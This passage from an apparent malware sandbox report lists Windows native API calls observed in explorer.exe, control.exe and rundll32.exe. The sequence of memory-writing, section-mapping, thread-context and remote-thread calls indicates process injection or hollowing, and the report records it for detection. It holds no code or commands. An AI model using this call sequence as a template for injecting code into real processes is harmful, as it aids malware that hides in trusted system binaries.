            Source: C:\Windows\explorer.exe; Code function: 29_2_04CE4674 NtQuerySystemInformation
            Source: C:\Windows\explorer.exe; Code function: 29_2_04CE33F8 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004E68E0 NtReadVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004F70B8 NtMapViewOfSection
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004F1154 NtSetInformationProcess, CreateRemoteThread, ResumeThread, FindCloseChangeNotification, FindCloseChangeNotification
            Source: C:\Windows\System32\control.exe; Code function: 30_2_005029D0 NtAllocateVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004EC188 RtlAllocateHeap, NtSetContextThread, NtUnmapViewOfSection, NtClose
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004F9B08 NtCreateSection
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004E33F8 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004E2CC0 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004E7F44 NtWriteVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 30_2_004F6F64 NtQueryInformationToken, NtQueryInformationToken, NtClose, NtClose
            Source: C:\Windows\System32\control.exe; Code function: 30_2_00521003 NtProtectVirtualMemory, NtProtectVirtualMemory
            Source: C:\Windows\System32\rundll32.exe; Code function: 32_2_000001B5767B6F64 NtQueryInformationToken, NtQueryInformationToken, NtClose, NtClose
            Source: C:\Windows\System32\rundll32.exe; Code function: 32_2_000001B5767A33F8 NtQueryInformationProcess
            Source: C:\Windows\System32\rundll32.exe; Code function: 32_2_000001B5767E1003 NtProtectVirtualMemory, NtProtectVirtualMemory
            Source: C:\Windows\explorer.exe